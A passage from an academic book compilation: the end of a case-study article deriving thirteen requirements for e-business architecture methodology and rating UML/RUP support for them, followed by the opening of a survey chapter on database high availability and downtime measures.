problems of systems integration, streamlining the organization and unifying the customer interface. However, during the project it became clear that the aforementioned conflicts and problems would have some unfavorable consequences. While it was of paramount importance for the company to be able to streamline its systems and develop a more coherent architecture enabling the creation of an e-business system, the realities of legacy systems and the organization led to situation where it was best to seek satisfying, even minimal, solutions instead of optimal ones. In the early phases of the project architecture was seen as general blueprints or roadmaps, largely drawn from scratch. Soon, however, the technical experts realized that evolutionary prototyping was the only possibility for progress in the architecture development. Because the schedule was tight, the objectives and requirements unclear and changing, and because the business units were rather independent, it was hard to achieve common understanding and commitment. With prototyping, it would be possible to clarify objectives and commit stakeholders by showing them visible results and benefits. This could be seen as “extreme” architecture design (MerisaloRantanen, Tuunanen, & Rossi, 2005). This could however lead to new problems. The technically oriented architects were specially worried that, combined with the quarter-based reporting system in the organization, evolutionary prototyping can easily produce quick-and-dirty and ad hoc solutions. We could classify the interviewees to those with positive attitudes towards prototyping and to those with negative or doubtful attitudes. In general, the project management believed positively that “somehow” the prototypes would transform to the final e-business solution, whereas technical architects presented more doubts and wanted to have explicit requirements and objective statements before committing to certain architectural solutions. Prototyping and minimal solutions formed a vicious circle that made the development of
Conflicts, Compromises, and Political Decisions
robust and clear architectures nearly impossible by severely limiting the options available for the architecture developers. Existing legacy systems, the evolutionary approach, varying requirements, unclear objectives, difficulties in creating common understanding, and problems in decision making created a complex situation where textbook methods, description languages, and rational architecture design, as it is conceived in the literature, had no possibilities for immediate success. The degrees of freedom of design became limited. The system and its architecture could not be designed rationally as a whole, but rather one needed to accept the conditions and limitations caused by the factors above and to keep the day to day operations running while the new systems are continuously created through evolution. The situation had also organizational consequences. We found clear hints of low-level networking and formation of shadow organizations as the result of unclear project organization and problems of decision-making and objective setting. As the organization and responsibilities change, new and perhaps inexperienced persons come into crucial official positions related to the e-business development. At the same time, the experienced architects and other key persons continued to stay in contact with each other. This unofficial shadow organization balanced the mismatch in skills and experience that might otherwise seriously impede the development. The final consequence from all the above is, that in fact the e-business architecture becomes emergent: it is created gradually through com-
promises, constraints, and conflicts (c.f., Ciborra, 2000; Hanseth, Monteiro, & Hatling, 1996). The exact objectives and responsibilities will be resolved as the architecture emerges through evolutionary prototyping. Compared to the conventional view on software architecture design (Hofmeister et al., 1999a), most of the claimed benefits of rigorous architecture development seem to be lost. There is no “grand plan” since the work is proceeding in a day-to-day basis and the well defined responses and interfaces between systems do not necessarily emerge in a rationally planned way, but rather most duplicate functions are kept and there is agreement only on a few items that become the “architecture.”
DERIVED REQUIREMENTS FOR E-BUSINESS SYSTEMS DEVELOPMENT METHODOLOGY From the previous observations and explanations, we can derive a set of requirements that an e-business systems development methodology should meet. The grounded theory process resulted in an explanation model (Figure 2), from which a set of methodological requirements can be extracted. Changing markets and organization, historical inertia, and unclear objectives for the development produced a complex combination of conflicts and problems that brought various difficult consequences to the e-business development process. We analyzed the complex socio-technical situation and its consequences and reasoned the set of most
Diverse objectives for e-business systems development Consequences to e business architecture development
Historical inertia
Changing markets , changing organization
Requirements for e-business development methods
1887
Conflicts, Compromises, and Political Decisions
pertinent methodological requirements. This was done by identifying and coding the methodological requirements in the interview transcripts and further combining them in 13 requirements as described below. According to Lyytinen et al. a design methodology should conform to a set of key requirements (Lyytinen, Smolander, & Tahvanainen, 1989). It must embed several conceptual structures and description languages, and support several levels of abstraction at which the development process takes place. It should also cover the whole spectrum of activities in information systems development (ISD), include a prescribed model of activities to be carried out during the development process, include a model of the organizational form of the development (a set of human roles), and try to reuse existing descriptions and implementations. Tools for drawing, manipulating, and managing the descriptions should also support the methodology, in a balanced manner. We can further elaborate this conception of ISD methodology by distinguishing between three separate contexts in ISD, namely the technical, language, and organization contexts (Lyytinen, 1987). The technical context is concerned with the technical components of the system (like hardware and software), language context forms the environment for linguistic communication, and the organization context provides the environment for systematic human interactions, including decision-making and operative control. An ISD methodology includes assumptions, models, languages, and tools related to these three contexts. In the following, we shall extract from the case the general requirements for e-business development methodology and classify them according to these contexts. The objective of this classification is to illustrate the nature and requirements of e-business architecture development in large organizations with several business areas and to highlight the areas with a weak methodical support. Lyytinen commented already in 1987 that most development methodologies have too limited
1888
scope and they tend to concentrate on technological issues late in the development lifecycle (Lyytinen, 1987). This limited scope omits most of the institutional and governance issues which seemed to be central for most stakeholders according to this study on architectural practice. One could argue that the organizational context is particularly relevant for e-business area, as most proponents of e-business emphasize the changes it brings about to work processes and organizations (Kalakota & Robinson, 2001). The research into e-business architecture development is in a relatively immature stage. Previous literature has largely assumed that it solves technical issues for known problems (Taylor, McWilliam, Forsyth, & Wade, 2002). However, from the previous passages it has become obvious that methods for forming the problem statement and reaching a mutual agreement on what the architecture is in the end of the day are crucial. In this section, we take this as a starting point and observe the issues that rose in the described case starting from the inner, technical context and ending to the general organizational issues. This corresponds to Lyytinen’s idea that the contexts are hierarchically ordered, because languages are presented by material carriers of technology context and language is needed for organized social action (Lyytinen, 1987). We identify e-architecture approaches in these areas and show how they propose solutions to the issues raised in our study. In the following, we shall present the methodological requirements for each context. We also refer to the rows in Table 1 with the notation R1-R13.
Requirements from the Technology Context Observed Requirements The technical requirements of e-business development methods do not differ much from those of
Conflicts, Compromises, and Political Decisions
methods for traditional transaction-based information systems. E-business system development includes methodical requirements concerning e.g. distribution, error recovery, and networking, but those requirements can be met without a special “e-business support.” A standard way to describe such technical solutions is of course required /R1/. Integrated e-business architecture necessitates the integration of information systems in the organization and the rationalization of technology and development processes. Existing legacy systems will be integrated to the e-business functionality. This requires the selection of an integrative technology and the construction of development processes supporting the implementation of the integration. Because the integration is the basis and characteristic to e-business development, the development methodology should have specialized and usable techniques for describing information systems integration /R2/. The key issue in the development of e-business systems is the keeping of the day-to-day operations running and at the same time implementing the integration between existing legacy systems and the new e-business functionality. This means that the nature of development is in many cases more analogous to a maintenance project than to a green-field development project. Current systems development methodologies and models of thought are mostly aimed at designing new systems instead of changing existing ones. This problem has been recognized before the advent of e-business, but it becomes more critical in the e-business development. From this we can derive a requirement that the development methodology for e-business systems should support evolutionary approaches to architectures and systems /R3/.
Existing Solutions Most research on e-business systems development in general, and e-business architecture in particular, concentrates on this view. Much of
the support that UML and RUP or their derivatives provide seems to concentrate on this area. Component aware methodologies, such as the Catalysis extension to UML, seem suitable for e-business. In addition, there are UML 2.0 extensions, such as SysML (Object Management Group, 2006), that provide better support for technical architecture design. Bischler and Segev (Bichler et al., 1998) investigate the possibilities of component oriented approach for e-business. They take a technical viewpoint, and provide a useful listing of enabling technologies for e-business. An applicable standard in this area is the SysML extension to UML (Object Management Group, 2006). A work by Rossi & Schwabe (Rossi & Schwabe, 2000) uses patterns and frameworks as building blocks for e-business systems. This kind of approach could be particularly useful for a relatively well-specified domain, such as trade processes, which are assumed to be generic in nature. Baskerville & Pries-Heje see a relatively fixed architecture as a common ground, on top of which e-business systems can be built (Baskerville & Pries-Heje, 2001). As mentioned earlier, in the e-business domain there are several layers of components available. The InterNCA architecture in (Lyytinen, Rose, & Welke, 1998) describes some of these and outlines needs for new breed of development methodologies, which would take into the account the particular problems of e-business systems development. Greunz & Stanoevska-Slabeva present an extension of UML, which can be used to realize systems on top of “media platform” architecture (Greunz & Stanoevska-Slabeva, 2002).
Requirements from the Language Context The language context provides a means and an environment for linguistic communication which encompasses the use, nature, content, context and form of signs (Lyytinen, 1987). The methodology requirements coming from the language
1889
Conflicts, Compromises, and Political Decisions
context deal with the ability of stakeholders to communicate successfully during the e-business architecture development process.
Observed Requirements The chicken-egg problem between objectives and architecture becomes problematic in e-business development. To design a robust technical architecture, one must have clear objectives, and to select realistic objectives, one must understand the possibilities of the technical architecture. To overcome this problem, it is necessary to have a close cooperation between technical architects and those responsible of the business. This, however, induces a language problem. These groups often do not have a common language. To overcome the language problem, we need architecture description languages that business managers understand /R4/ and business descriptions that are explicit enough for technical people /R5/. The problems of objectives and integration culminate on architecture design because the designs and prototypes related to technical architecture become the first concrete artifacts in the development showing implications of decisions to businesses and to the information management. Before architecture design, the plans and designs have been on the “PowerPoint presentation” level, showing ambiguous and general roadmaps and noble objectives. The more concrete the architecture becomes, the more various stakeholders become aware of the consequences, conflicts, and problems they will be facing. This leads to two distinct requirements for the development methodology: the methodology should take the development to a very concrete level (both politically and technically) very soon after the project initiation /R6/ and the architecture designs and descriptions (and their implications) should be approachable and intelligible by the various stakeholders participating the process /R7/.
1890
Existing Solutions As a description language, UML and its extensions offer a fairly strong support for engineering in the language context. Yet, there are very few articles describing these issues of having a common language in e-business area, but one could expect that methodologies used in other domains for participative processes and joint application development could be applied here (August, 1991). In this context, architecture serves as a language between the participants in the development process, enabling communication and making the consequences of the implementation concrete to the participants. Using architecture as an enabler of communication between a diverse set of participants (including various levels of management and technical experts) requires informal and expressive approaches, which are practically non-existent in the field of software architecture research. This kind of conception of “architecture as language” can be associated with approaches that include rich and informal description techniques, like “rich pictures” in (Wood-Harper, 1985), the wall-charting technique (Saaren-Seppälä, 1988), and genre-based approaches (Päivärinta, Halttunen, & Tyrväinen, 2001).
Requirements from the Organization Context Observed Requirements These problems formed the largest bulk in our study. They included issues such as organizational inertia as well as environmental limitations, characteristics of a given business environment, codes of conduct in business, and regulatory and societal factors. These factors form together the ‘ballpark’ for an organization to act in relationship with its providers and customers.
Conflicts, Compromises, and Political Decisions
The first organizational requirement comes from the overall conclusion of the case. The transition from heterogeneous e-commerce to integrated e-business is not only technically challenging. It is more a profound change to the organization. In fact, the primary challenge is in the change of the organization, not in the implementation of the technology. Therefore, e-business systems development methodology should support also the description of organizational change /R8/. In this change of organization and implementation of technology, the role of central information management or some kind of central authority in the organization is crucial. The central authority should take care of the multitude of conflicts occurring when aiming at integration and coordinate the creation of objectives for the system. An ebusiness development methodology should enable the creation of a common vision /R9/, which can then be enforced by the central authority. Evolution with modest but growing objectives may be the only way to develop integrated e-business systems. To foster commitment, some immediate benefits should be shown with the prototypes for each stakeholder. However, at the same time, the path to robust architecture should also be secured and enough time and resources must be given to technical architects. This very difficult and complex trade-off must be made in every e-business project /R10/. The implementation of e-business integration deals not only with technical issues but also with difficult political ones. An organization shifting to integrated e-business must resolve issues concerning the internal ownership of information related for instance to customers, sales, contracts, and products. The ownership and responsibilities related to information must be decided and described during the development process. The development methodology should include descriptions for organizational responsibilities and ownership of information /R11/. Identifying and agreeing about objectives became the most difficult problem in this case.
Thus, to become valuable in practice, e-business development methodology should support not only the formation and recording of objectives but also measuring of success related to objectives /R12/. The requirements directed to an e-business development organization are quite conflicting. On the other hand, the development requires a strong authority that can control the process through conflicts, and on the other hand, the formation of unofficial and shadow organization (peer-level networking) should be fostered to allow creative solutions and frictionless cooperation between businesses /R13/. This requirement is, however, not a new one when developing organizations.
Existing Solutions From a more managerial and decision oriented view one could look at business- and strategy development methods, which aim at creation of a common understanding and vision of business strategy. This view sees building of architecture as a common vision building effort rather than a system building effort. It could also be argued that e-business architecture building is quite similar to organizational change processes, especially the introduction of enterprise wide information systems, such as ERP. Koontz has argued for this by presenting e-business architecture development model, which is very generic (Koontz, 2000). Organizational issues are largely neglected by the traditional systems development methodologies, but form important context and frame for the implementation of the e-business systems and architectures. The work on organizational change and observation of the power-play could be fruitful if applied to early stages of architecture development. However, they do merely observe the issues than provide solutions. Checkland’s SSM methodology is one of the few general-purpose methodologies that identifies and models the “essence” of the organizational idea of the system and then proceeds to actual development of the
1891
Conflicts, Compromises, and Political Decisions
system (Checkland & Scholes, 1990). It is clear from the observations in this case study that the explicit identification and framing of the problem to be solved, and then resolving the actual goals of the architecture forms the basis for architecture development. Most studies thus far seem to assume that the development of e-architecture and infrastructure can be guided by the deliberate actions and decisions of management. However, as can be seen here the technological changes often evolve from designers’ and users’ experience with such technologies and are often unpredictable (Ciborra, 2000).The problem of loosing the original target while developing partial solutions and prototypes (e.g., see R10) could be helped by explicitly recognizing emergent and opportunistic possibilities created on the process.
Summary of Issues The list above shows that most solutions and research this far, has concentrated on the technical level. Unfortunately, most of the problems seem to be non-technical in nature, they are rather more of the linguistic or organizational. E-business cuts across functional borders in organization and is built on a complex infrastructure of ERP and legacy systems and it shares many of the challenges and opportunities of these organizational technologies. Table 2 summarizes these derived requirements for e-business development methodology. The requirements and their rationale are described in the text above. The ‘Type’ column places the requirement to the appropriate context or contexts (T: technology, L: language, O: organizational). The last column in the table (“Support in RUP employing UML”) analyzes how unified modeling language (Object Management Group, 2005) and the Unified Process (Rational Software Corporation, 2001) support the e-business specific
1892
characteristics of the development process. This is important, because UML and RUP together form the current methodological basis for many software organizations. The column shows that the support is generally poor. The e-business specific requirements are not met by UML and RUP —only the standard technical issues are well covered. This conclusion calls for method development supporting better these e-business specific requirements. In the technical context we noted that e-business development would benefit from method enhancements in IS integration and evolutionary development. However, the language and especially the organization context appeared to have more importance in the development. In the language context, there was an urgent need for more understandable and concrete architecture descriptions that could be used among many groups involved in the process, including technical and non-technical people. The organization context appeared as the most important target for research and practical methodical improvements. In that context, we could identify a multitude of issues requiring improvements, including better understanding and usable methods for the design and implementation of organization change, organizational vision, organizational ownership of information, and organizational responsibilities. Figure 3 shows concisely our findings. When creating e-business or enterprise architecture, the major problems to be solved are organizational. This does not align with the support that UML and RUP provides, because they mostly concentrate on solving the problems in the language and technical contexts. It is the task of future research to provide improvements to this, but, as can be seen from Table 2, it might need quite radical extensions or changes to UML and RUP to be able to support effectively the formation of e-business architecture.
Conflicts, Compromises, and Political Decisions
Table 2. Summary of the requirements for e-business development methodology Requirement
R1
Technical issues (like distribution, error recovery, and networking) must be described in a standard way.
R2
Specialized techniques for describing the information systems integration
R3
The development methodology should support evolutionary approaches to architectures and systems.
R4
Architectural description languages that business managers understand
R5
Business descriptions that are explicit enough for technical people
Type
Rationale
Support in RUP employing UML
T
These issues will occur as in all modern systems development
Good; this is what UML and RUP are for
T
IS integration is characteristic to e-business development
Poor; no specialized technique for the description of integration in standard UML. Some UML 2.0 extensions are however available.
L/T
The change and maintenance of existing systems forms a major part of the e-business systems development
Moderate; UML and RUP are mainly targeted at the development of new systems
L
To enable realistic objective selection, business managers must have some understanding on architecture
Poor; the descriptions necessitate too much technical skills and knowledge
L
To understand the objectives, technical people must have understanding on business
Moderate; no description techniques showing overall aggregate view
R6
The methodology should take the development to a very concrete level (both politically and technically) soon after the project initiation
T/L/ O
The more architecture becomes concrete, the more stakeholders become aware of the consequences, conflicts, and problems
Good (technically), none (politically)
R7
The architecture designs and descriptions (and their implications) should be approachable and intelligible by the various stakeholders participating the process
L/O
To enable wide understanding to the consequences of architectural selections (cf. R4).
Moderate; no relevant description technique besides Use Case diagrams
R8
Support for the description of organizational change
O
e-business involves deep changes to organization
Poor; some thoughts of “organization engineering” in RUP’s Business Architecture
R9
Support for the description of a common vision
O
Resolve conflicts, build objectives
Poor; no common language for all stakeholders
R10
Both prototyping and careful architecture design needed
T
Gain commitment and resolve objectives through prototyping, aim at robust architecture
Moderate; iterative basis in RUP, but its implementation is difficult in practice
continued on following page
1893
Conflicts, Compromises, and Political Decisions
Table 2. continued Requirement
Type
Support in RUP employing UML
Rationale
R11
Methodology should contain descriptions for organizational responsibilities and ownership of information
L/O
The ownership of information becomes an issue when aiming at e-business integration
Poor; only general thoughts
R12
e-business development methodology should support the formation and recording of objectives and measuring of success related to objectives
L/O
Identifying and agreeing about objectives is one of the most difficult issues in e-business development
Poor; the objectives are mostly supposed to be given to the development project
R13
The development process should support organizationally both effective control structures and flexibility
O
Strong authority is needed to handle the conflicts and unofficial structures for creative solutions
Poor; development organization “design” in a general level
Figure 3. Support and requirements Benefits of UML/RUP High
High
Medium
Medium
Low
Low Technical
Language
Organizational
CONCLUSION We have described a process where a large ICT company is building architecture for a comprehensive e-business system. From the case, we extracted 13 requirements for methodology supporting integrated e-business systems development and classified the requirements to technology, language, and organization contexts. We also compared the requirements to the support that UML and RUP offers and concluded that the e-business specific requirements are not met in UML and RUP. Successful e-business development requires alternative approaches that support better organization change, communication between stakeholders, systems integration, objective formation, and evolutionary development.
1894
Problems in architecture creation
Technical
Language
Organizational
In our study, architecture manifested itself as a catalyst that makes business and organizational conflicts and problems concrete. When making decisions about architecture, the systems architects had to take into account the organizational situation in the company. At the same time the architecture starts shaping and changing the organization, thus forming a double mangle (e.g., Jones, 1998). The architects also realized that technical rationality is not enough for success in this kind of a situation. To succeed in e-business architecture development, one has to be aware of the political and organizational forces that are driving the development and its objectives. E-business architecture development can therefore be characterized as a process of seeking boundaries, finding sufficient consensus, and identifying com-
Conflicts, Compromises, and Political Decisions
monalities across organizational borders. Most previous literature on architectural methods has neglected this and sought to develop description languages for describing the actual architectures for systems with clear problem statements, whereas we claim that it would be more important to seek tools that aid in building common understanding about the system and its architecture and tools for processing the emerging conflicts. Thus, we maintain that the field of architecture for e-business would benefit from tools that help to identify and process the emerging conflicts than tools that aid in developing a technically “perfect” and optimized solution. These tools could be used in early phases of development to augment UML and RUP based tools. Examples of such tools are group support systems and different participation facilitation systems. Thus we do not call for replacing UML, but rather adding tools that can be used to communicate with nontechnical people about the architecture.
ACKNOWLEDGMENT We would like to thank the anonymous reviewers of this paper for their valuable instructions and especially the reviewer that gave us the simple idea of Figure 3.
REFERENCES August, J. H. (1991). Joint application design: The group session approach to system design. Englewood Cliffs, NJ: Yourdon Press. Baskerville, R., & Pries-Heje, J. (2001, July 27-29). Racing the e-bomb: How the internet is redefining information systems development methodology. Proceedings of the IFIP TC8/WG8.2 Working Conference on Realigning Research and Practice in Information Systems Development: The Social and Organizational Perspectice (pp. 49-68). Boise, Idaho.
Bichler, M., Segev, A., & Zhao, J. L. (1998). Component-based e-commerce: Assesment of current practices and future directions. SIGMOD Record, 27(4), 7-14. Checkland, P. B., & Scholes, J. (1990). Soft system methodology in action. Chichester: John Wiley and Sons. Ciborra, C. (2000). Drifting: From control to drift. In K. Braa, C. Sorensen & B. Dahlbom (Eds.), Planet internet. Lund: Studentlitteratur. Conallen, J. (1999). Modeling web application architectures with UML. Communications of the ACM, 42(10), 63-70. D’Souza, D. F., & Wills, A. C. (1998). Objects, components, and frameworks with UML: The catalysis approach: Addison-Wesley. Dashofy, E. M., Van der Hoek, A., & Taylor, R. N. (2005). A comprehensive approach for the development of modular software architecture description languages. ACM Transactions on Software Engineering and Methodology, 14(2), 199-245. Denzin, N. K. (1978). The research act: A theoretical introduction to sociological methods: McGraw-Hill. Dori, D. (2001). Object-process methodology applied to modeling credit card transactions. Journal of Database Management, 12(1), 4. Egyed, A., & Medvidovic, N. (1999, Oct). Extending Architectural Representation in UML with View Integration. Proceedings of the 2nd International Conference on the Unified Modelling Language (UML), (pp. 2-16). Fort Collins, CO. Eisenhardt, K. M. (1989). Building theories from case study research. Academy of Management Review, 14(4), 532-550. Fernández, W. D., Lehmann, H., & Underwood, A. (2002, June 6-8). Rigour and relevance in studies of IS innovation: A grounded theory methodology
1895
Conflicts, Compromises, and Political Decisions
approach. Proceedings of the European Conference on Information Systems (ECIS) 2002, (pp. 110-119).Gdansk, Poland.
Jacobson, I., Booch, G., & Rumbaugh, J. (1999). The unified software development process. New York: Addison-Wesley.
Garlan, D., & Kompanek, A. J. (2000). Reconciling the needs of architectural description with object-modeling notations. Proceedings of the Third International Conference on the Unified Modeling Language - UML 2000, (pp. 498-512). York, UK.
Jones, M. (1998). Information Systems and the Double Mangle: Steering a Course Between the Scylla of Embedded Structure and the Charybdis of Strong Symmetry. IFIP WG8.2/8.6 Joint Working Conference, Helsinki, Finland.
Glaser, B. (1978). Theoretical sensitivity: Advances in the methodology of grounded theory. Mill Valley: Sociology Press. Glaser, B., & Strauss, A. L. (1967). The discovery of grounded theory: Strategies for qualitative research. Chigago: Aldine. Greunz, M., & Stanoevska-Slabeva, K. (2002). Modeling business media platforms. 35th Annual Hawaii International Conference on System Sciences, Maui, HI. Grinter, R. E. (1999). Systems architecture: Product designing and social engineering. ACM SIGSOFT Software Engineering Notes, 24(2), 11-18. Hanseth, O., Monteiro, E., & Hatling, M. (1996). Developing information infrastructure: The tension between standardization and flexibility. Science, Technology & Human Values, 21(4), 407-426. Hirschheim, R., & Klein, H. K. (1989). Four paradigms of information systems development. Communications of the ACM, 32(10), 1199-1216. Hofmeister, C., Nord, R., & Soni, D. (1999a). Applied software architecture. Reading, MA: Addison-Wesley. Hofmeister, C., Nord, R., & Soni, D. (1999b). Describing software architecture with UML. Proceedings of the First Working IFIP Conference on Software Architecture (WICSA1), (pp. 145-160). San Antonio, TX.
1896
Kalakota, R., & Robinson, M. (2001). e-Business 2.0: Roadmap for Success: Addison-Wesley. Kazman, R., Klein, M., & Clements, P. (2000). ATAM: Method for Architecture Evaluation (Technical report No. CMU/SEI-2000-TR-004): Software Engineering Institute. Kim, Y.-G., & Everest, G. C. (1994). Building an IS architecture: Collective wisdom from the field. Information & Management, 26(1), 1-11. Koontz, C. (2000). Develop a solid e-commerce architecture. e-Business Advisor(January). Kuntzmann, A., & Kruchten, P. (2003). The rational unified process—an enabler for higher process maturity. Retrieved April 19, 2007 from http://www-128.ibm.com/developerworks/rational/library/content/03July/0000/0579/Rational_CMM_WhitePaper.pdf. Leist, S., & Zellner, G. (2006, April 23-27). Evaluation of current architecture frameworks. SAC’06, (pp. 1546-1553). Dijon, France. Locke, K. (2001). Grounded theory in management research: SAGE Publications. Lyytinen, K. (1987). A taxonomic perspective of information dystems fevelopment: Theoretical constructs and recommendations. In R. J. Boland, Jr. & R. A. Hirschheim (Eds.), Critical issues in information systems research (pp. 3-41): John Wiley & Sons. Lyytinen, K., Rose, G., & Welke, R. (1998). The brave new world of development in the internetwork computing architecture (InterNCA): Or how
Conflicts, Compromises, and Political Decisions
distributed computing platforms will change systems development. Information Systems Journal, 8(3), 241-253. Lyytinen, K., Smolander, K., & Tahvanainen, V.-P. (1989). Modelling CASE environments in systems development. Proceedings of CASE’89 the First Nordic Conference on Advanced Systems Engineering, Stockholm. Martin, P. Y., & Turner, B. A. (1986). Grounded theory and organizational research. The Journal of Applied Behavioral Science, 22(2), 141-157. Medvidovic, N., Egyed, A., & Rosenblum, D. S. (1999). Round-trip software engineering using UML: From architecture to design and back. Proceedings of the 2nd Workshop on Object-Oriented Reengineering (WOOR), Toulouse, France, Sept. 1999, 1-8. Medvidovic, N., & Taylor, R. N. (2000). A classification and comparison framework for software architecture description languages. IEEE Transactions on Software Engineering, 26(1), 70-93. Merisalo-Rantanen, H., Tuunanen, T., & Rossi, M. (2005). Is extreme programming just old wine in new bottles: A comparison of two cases. Journal of Database Management, 16(4), 41. Monroe, R. T., Kompanek, A., Melton, R., & Garlan, D. (1997). Architectural styles, design patterns, and objects. IEEE Software, 14(1), 43-52. Object Management Group. (1999). UML Profile for Enterprise Distributed Object Computing: Request for Proposals (ad/99-03-10): OMG. Object Management Group. (2005). Unified modeling language: Superstructure version 2.0 (No. formal/05-07-04). Object Management Group. (2006). OMG SysML Specification (ptc/06-05-04). Päivärinta, T., Halttunen, V., & Tyrväinen, P. (2001). A genre-based method for information system planning. In M. Rossi & K. Siau (Eds.),
Information modeling in the new millennium (pp. 70-93). Hershey, PA: Idea Group. Rational Software Corporation. (2001). Rational Unified Process [Online documentation, Version 2001A.04.00]. Robson, C. (2002). Real world research, (2nd ed.). Blackwell Publishing. Ross, J. W., Weill, P., & Robertson, D. C. (2006). Enterprise architecture as strategy: Creating a foundation for business execution: Harvard Business School Press. Rossi, G., & Schwabe, D. (2000). Object-oriented web applications modeling. In M. Rossi & K. Siau (Eds.), Information modelling in the next millennium. Hershey: IDEA Group Publishing. Rumpe, B., Schoenmakers, M., Radermacher, A., & Schürr, A. (1999). UML + ROOM as a Standard ADL. Fifth IEEE International Conference on Engineering of Complex Computer Systems, (pp. 43-53). Saaren-Seppälä, K. (1988). Wall chart technique: The use of wall charts for effective planning. Helsinki: Kari Saaren-Seppälä Ky. Sauer, C., Southon, G., & Dampney, C. N. G. (1997). Fit, failure, and the house of horrors: Toward a configurational theory of IS project failure. Proceedings of the eighteenth international conference on Information systems, (pp. 349-366). Atlanta, Georgia. Shaw, M., & Garlan, D. (1996). Software architecture: Perspectives on an emerging discipline: Prentice Hall. Siau, K. & Cao, Q. (2001). Unified modeling language (UML) — a complexity analysis. Journal of Database Management, 12(1), 26-34. Siau, K., Erickson, J., & Lee, L. Y. (2005). Theoretical vs. practical complexity: The case of UML. Journal of Database Management, 16(3), 40-57.
1897
Conflicts, Compromises, and Political Decisions
Smolander, K. (2003, January 6-9,). The birth of an e-business system architecture: Conflicts, compromises, and gaps in methods. Hawaii International Conference on System Sciences (HICSS’36), Hilton Waikoloa Village, Big Island, Hawaii.
Smolander, K., Rossi, M., & Purao, S. (2005, May 26-28). Going beyond the blueprint: Unraveling the complex reality of software architectures. 13th European Conference on Information Systems: Information Systems in a Rapidly Changing Economy, Regensburg, Germany.
Smolander, K., Hoikka, K., Isokallio, J., Kataikko, M., & Mäkelä, T. (2002, April, 8-11). What is included in software architecture? A case study in three software organizations. Proceedings of 9th annual IEEE International Conference and Workshop on the Engineering of Computer-Based Systems (pp. 131-138). (ECBS) 2002, Lund, Sweden.
Sowa, J. F., & Zachman, J. A. (1992). Extending and formalizing the framework for information systems architecture. IBM Systems Journal, 31(3), 590-616.
Smolander, K., & Päivärinta, T. (2002a, May 27 - 31). Describing and communicating software architecture in practice: Observations on stakeholders and rationale. Proceedings of CAiSE’02 - The Fourteenth International Conference on Advanced Information Systems Engineering, (pp. 117-133).Toronto, Canada. Smolander, K., & Päivärinta, T. (2002b, Aug 2530). Practical rationale for describing software architecture: Beyond programming-in-the-large. Software Architecture: System Design, Development and Maintenance - IFIP 17th World Computer Congress - TC2 Stream / 3rd Working IEEE/IFIP Conference on Software Architecture (WICSA3), (pp. 113-126). Montréal, Québec, Canada. Smolander, K., Rossi, M., & Purao, S. (2002, December 18). Software architecture: Metaphors across contexts. AIS Theory Development Workshop, Barcelona.
Star, S. L., & Griesemer, J. R. (1989). Institutional cology, “translations” and boundary objects: Amateurs and professionals in berkeley’s museum of vertebrate zoology, 1907-39. Social Studies of Science, 19, 387-420. Strauss, A. L., & Corbin, J. (1990). Basics of qualitative research: Grounded theory procedures and applications. Newbury Park, CA: Sage Publications. Taylor, M. J., McWilliam, J., Forsyth, H., & Wade, S. (2002). Methodologies and website development: A survey of practice. Information and Software Technology, 44(6), 381-391. Wood-Harper, T. (1985). Research methods in information systems: Using action research. In E. Mumford, R. A. Hirschheim, G. Fitzgerald & T. Wood-Harper (Eds.), Research methods in information systems. New York: North-Holland Publishers.
This work was previously published in Journal of Database Management, Vol. 19, Issue 1, edited by K. Siau, pp. 19-40, copyright 2008 by IGI Publishing (an imprint of IGI Global).
1898
1899
Chapter 6.2
Database High Availability: An Extended Survey
Moh’d A. Radaideh Abu Dhabi Police – Ministry of Interior, United Arab Emirates Hayder Al-Ameed United Arab Emirates University, United Arab Emirates
ABSTRACT
INTRODUCTION
With the advancement of computer technologies and the World Wide Web, there has been an explosion in the amount of available e-services, most of which represent database processing. Efficient and effective database performance tuning and high availability techniques should be employed to insure that all e-services remain reliable and available all times. To avoid the impacts of database downtime, many corporations have taken interest in database availability. The goal for some is to have continuous availability such that a database server never fails. Other companies require their content to be highly availabile. In such cases, short and planned downtimes would be allowed for maintenance purposes. This chapter is meant to present the definition, the background, and the typical measurement factors of high availability. It also demonstrates some approaches to minimize a database server’s shutdown time.
High availability of software systems has become very critical due to several factors that are related Table 1. Downtime measurements at various availability rates Availability Percentage
to the environment, processes and development strategies, hardware complexity, and the amount of dollars and human resources invested in the system. High availability cannot be achieved by just implementing a given service level or solution. Systems should be designed such that all factors that may lead the system to go down should be well-treated, if not eliminated. In today’s competitive business landscape, 24/7 operations become the standard, especially for the e-services-driven areas (e.g., e-commerce, e-government, e-learning, etc.) Downtime of applications, systems, or networks typically translates into significant revenue loss. Industry experts and analysts agreed on that in order to support e-service applications, typical network availability must reach 99.999%. In other words, networks must be at the “5-Nines” availability level (Providing Open Architecture, 2001). Reaching this level of availability requires careful planning and comprehensive end–to-end strategy. To demonstrate the impact of not being at the “5-Nines” availability level, a system with 97% availability will incur approximately 263 hours (6.6 days) of downtime per year. With 99 percent availability, downtime will be 88 hours (2.2 days) per year. Table 1 summarizes the impact of service downtime according to the availability ratings. High Availability is not achieved through a single product or process. It is the result of an end-to-end analysis and reengineering of the entire service chain including the combination of people, processes, and technological factors (Otey & Otey, 2005). Every device or circuit in the path between client and server is a link in this service chain, and each must be considered separately. A chain is only as strong as its weakest link. As more applications are delivered via Web browsers, the emphasis for high availability is spreading from back-end databases toward front-end and middleware devices like Web servers and firewalls. Database management systems (DBMS) play a pivotal role in much of today’s business computing environment, underpinning electronic services
1900
operations, providing critical business support through data warehousing and mining, and managing the storage and processing of much of the world’s financial data. As they are entrusted with the storage and processing of such critical data, one would assume that databases are designed to be reliable and highly available. This chapter provides an overview of the high availability in general, and describes the business drivers behind it, or how it is measured. It focuses on the meaning of database high availability, its functionality and design strategies that emerge with the shift from technology-centric orientation of keeping the system running, to a more customercentric focus on ultra-dependable services. The view of high availability provided in this chapter has no bias towards high availability practices offered today by the different DBMS vendors. This chapter is organized into seven sections. The first section provides a generic introduction on the chapter’s subject. The second section overviews the high availability-related issues. The third section discusses the model environment for highly-available systems. The fourth section discusses several strategies for database high availability. The fifth section discusses performance impact of high availability. The sixth section overviews several high availability solutions. The seventh section overviews a simple availability-benchmarking methodology.
HIGH AVAILABILITY OVERVIEW A system is composed of a collection of interacting components. A system provides one or more services to its consumers. A service is the output of a system that meets the specification for which the system was devised, or agrees with what system users have perceived as the correct output values. Service failures are incorrect results with respect to the specification or unexpected behavior perceived by the users of the service. The cause of
Database High Availability
